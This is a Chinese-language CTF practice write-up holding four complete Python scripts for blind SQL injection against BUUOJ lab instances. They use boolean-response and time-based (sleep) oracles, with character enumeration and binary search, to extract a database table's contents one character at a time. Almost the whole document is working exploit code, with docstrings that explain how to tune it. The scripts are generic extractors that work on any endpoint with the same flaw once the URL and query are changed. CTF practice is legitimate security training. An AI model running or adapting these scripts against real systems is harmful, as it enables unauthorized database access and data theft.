题目本身很简单（布尔盲注 / 时间盲注），主要是练习一下注入脚本的写法，做下记录方便查阅。
exp
枚举法（布尔盲注：逐位枚举字符集，响应中含 "Hello" 即命中）
import requests
import string
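url = "http://e57aa3be-d1dc-4ed4-a3a2-35878118c101.node5.buuoj.cn:81/index.php"
# Candidate characters tried at every position, in this order.  A flag
# character outside this set (e.g. a space) cannot be recovered and ends the
# extraction early -- widen the set if the result looks truncated.
CHARSET = string.ascii_letters + string.digits + string.punctuation
MAX_LEN = 99  # positions 1..99 are probed, as in the original loop


def boolean_oracle(payload: str) -> bool:
    """POST `payload` as the `id` field; True iff the page answered "Hello".

    The target prints "Hello" only when the injected `if(...)` evaluates to 1,
    which turns one request into a yes/no answer for one SQL condition.
    """
    r = requests.post(url, data={"id": payload})
    return "Hello" in r.text


def enumerate_flag(oracle, charset: str = CHARSET, max_len: int = MAX_LEN) -> str:
    """Recover `flag.flag` one character at a time by enumerating `charset`.

    Args:
        oracle: callable taking the injected `id` value and returning True when
            the embedded condition held (see `boolean_oracle`).
        charset: candidate characters, tried in order at each position.
        max_len: maximum number of positions probed.

    Returns:
        The recovered flag prefix.  Extraction stops at the first position where
        no candidate matches: past the end of the flag substr() yields '' and
        matches nothing, so there is no point sending another ~94 requests per
        remaining position.  A character outside `charset` stops it too.
    """
    flag = ""
    for i in range(1, max_len + 1):
        for j in charset:
            # Compare ASCII codes instead of quoting the candidate: with the
            # original `='{}'` form the candidates `'` and `\` broke the SQL
            # string literal and could never match.
            payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))={ord(j)},1,0)"
            if oracle(payload):
                flag += j
                print(flag)
                break
        else:
            # nothing matched at this position: end of flag (or unknown char)
            break
    return flag


if __name__ == "__main__":
    enumerate_flag(boolean_oracle)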
二分法（布尔盲注：对每一位的 ASCII 码做二分查找，每位约 7 次请求）
import requests
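url = "http://e57aa3be-d1dc-4ed4-a3a2-35878118c101.node5.buuoj.cn:81/index.php"
MAX_LEN = 99  # positions 1..99 are probed, as in the original loop


def boolean_oracle(payload: str) -> bool:
    """POST `payload` as the `id` field; True iff the page answered "Hello".

    "Hello" appears only when the injected `if(...)` evaluates to 1, so each
    request answers one yes/no SQL question.
    """
    r = requests.post(url, data={"id": payload})
    return "Hello" in r.text


def bisect_char(oracle, i: int, low: int = 0, high: int = 127) -> int:
    """Binary-search the ASCII code of the i-th (1-based) flag character.

    Each probe asks whether ascii(char) > mid; the search converges on the
    smallest value in [low, high] for which the answer is "no", i.e. the code
    itself.  `low` starts at 0 rather than 32 so that a position past the end
    of the flag (MySQL's ascii('') is 0) comes back as 0 instead of 32 -- the
    original script converged on a space there and kept appending spaces
    until position 99.
    """
    while low < high:
        mid = (low + high) // 2
        payload = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,0)"
        if oracle(payload):
            low = mid + 1
        else:
            high = mid
    return low


def bisect_flag(oracle, max_len: int = MAX_LEN) -> str:
    """Recover `flag.flag` by bisecting each character's ASCII code.

    Args:
        oracle: callable taking the injected `id` value and returning True when
            the embedded condition held (see `boolean_oracle`).
        max_len: maximum number of positions probed.

    Returns:
        The recovered flag; stops as soon as a position bisects to 0 (end).
    """
    result = ""
    for i in range(1, max_len + 1):
        code = bisect_char(oracle, i)
        if code == 0:
            break  # past the end of the flag
        result += chr(code)
        print(result)
    return result


if __name__ == "__main__":
    bisect_flag(boolean_oracle)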
时间盲注（逐位枚举：条件成立时执行 sleep(2)，以请求读超时作为命中判据）
import requests
import string
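url = "http://47b3e9b9-1cba-42c3-9231-d5131f3a8df1.node5.buuoj.cn:81/index"
# Candidate characters tried at every position; a flag character outside this
# set cannot be recovered and ends the extraction early.
CHARSET = string.ascii_letters + string.digits + string.punctuation
MAX_LEN = 99  # positions 1..99 are probed, as in the original loop
# The payload sleeps SLEEP_SECONDS when its condition holds and the client
# stops reading after TIMEOUT, so a true condition always shows up as a read
# timeout.  A *false* response that itself takes longer than TIMEOUT (slow
# target or link) is misread as a hit -- raise both values on a noisy network.
SLEEP_SECONDS = 2
TIMEOUT = SLEEP_SECONDS


def timed_out(payload: str) -> bool:
    """POST `payload` as `id`; True iff no response arrived within TIMEOUT.

    Only a read timeout is evidence that the injected sleep() ran.  The original
    bare `except:` counted every failure (connection refused, DNS error, even
    Ctrl-C) as a hit and silently corrupted the flag; other errors now propagate
    so the run fails loudly instead.
    """
    try:
        requests.post(url=url, data={"id": payload}, timeout=TIMEOUT)
    except requests.exceptions.ReadTimeout:
        return True
    return False


def enumerate_flag(oracle, charset: str = CHARSET, max_len: int = MAX_LEN) -> str:
    """Recover `flag.flag` one character at a time by enumerating `charset`.

    Args:
        oracle: callable taking the injected `id` value and returning True when
            the embedded condition held (see `timed_out`).
        charset: candidate characters, tried in order at each position.
        max_len: maximum number of positions probed.

    Returns:
        The recovered flag prefix.  Extraction stops at the first position where
        nothing matches (end of flag, a character outside `charset`, or a missed
        timeout on a flaky link -- re-run if the result looks short).
    """
    flag = ""
    for i in range(1, max_len + 1):
        for j in charset:
            # Compare ASCII codes instead of quoting the candidate: with the
            # original `='{}'` form the candidates `'` and `\` broke the SQL
            # string literal and could never match.
            payload = (
                f"if(ascii(substr((select(flag)from(flag)),{i},1))={ord(j)},"
                f"sleep({SLEEP_SECONDS}),0)"
            )
            if oracle(payload):
                flag += j
                print(flag)
                break
        else:
            break  # nothing matched at this position
    return flag


if __name__ == "__main__":
    enumerate_flag(timed_out)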
时间盲注二分法（对每一位的 ASCII 码做二分查找，以请求读超时作为判据）
import requests
import string
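url = "http://47b3e9b9-1cba-42c3-9231-d5131f3a8df1.node5.buuoj.cn:81/index"
MAX_LEN = 99  # positions 1..99 are probed, as in the original loop
# The payload sleeps SLEEP_SECONDS on its false branch and the client stops
# reading after TIMEOUT, so "not greater" always shows up as a read timeout.
# A non-sleeping response that takes longer than TIMEOUT is misread as a
# timeout -- raise both values on a noisy network.
SLEEP_SECONDS = 2
TIMEOUT = SLEEP_SECONDS


def timed_out(payload: str) -> bool:
    """POST `payload` as `id`; True iff no response arrived within TIMEOUT.

    Only a read timeout is evidence that the injected sleep() ran.  The original
    bare `except:` treated every failure (connection refused, DNS error, Ctrl-C)
    as a timeout and steered the bisection the wrong way; other errors now
    propagate so the run fails loudly.
    """
    try:
        requests.post(url=url, data={"id": payload}, timeout=TIMEOUT)
    except requests.exceptions.ReadTimeout:
        return True
    return False


def bisect_char(oracle, i: int, low: int = 0, high: int = 127) -> int:
    """Binary-search the ASCII code of the i-th (1-based) flag character.

    The probe sleeps when ascii(char) > mid is *false* (as in the original
    payload), so a timeout means "not greater" and narrows `high`.  `low`
    starts at 0 rather than 32 so a position past the end of the flag (MySQL's
    ascii('') is 0) is reported as 0 instead of being mistaken for a space.
    """
    while low < high:
        mid = (low + high) // 2
        payload = (
            f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},0,"
            f"sleep({SLEEP_SECONDS}))"
        )
        if oracle(payload):
            high = mid  # sleep branch ran: code <= mid
        else:
            low = mid + 1
    return low


def bisect_flag(oracle, max_len: int = MAX_LEN) -> str:
    """Recover `flag.flag` by bisecting each character's ASCII code.

    Args:
        oracle: callable taking the injected `id` value and returning True when
            the request timed out (see `timed_out`).
        max_len: maximum number of positions probed.

    Returns:
        The recovered flag; stops as soon as a position bisects to 0 (end).
    """
    flag = ""
    for i in range(1, max_len + 1):
        code = bisect_char(oracle, i)
        if code == 0:
            break  # past the end of the flag
        flag += chr(code)
        print(flag)
    return flag


if __name__ == "__main__":
    bisect_flag(timed_out)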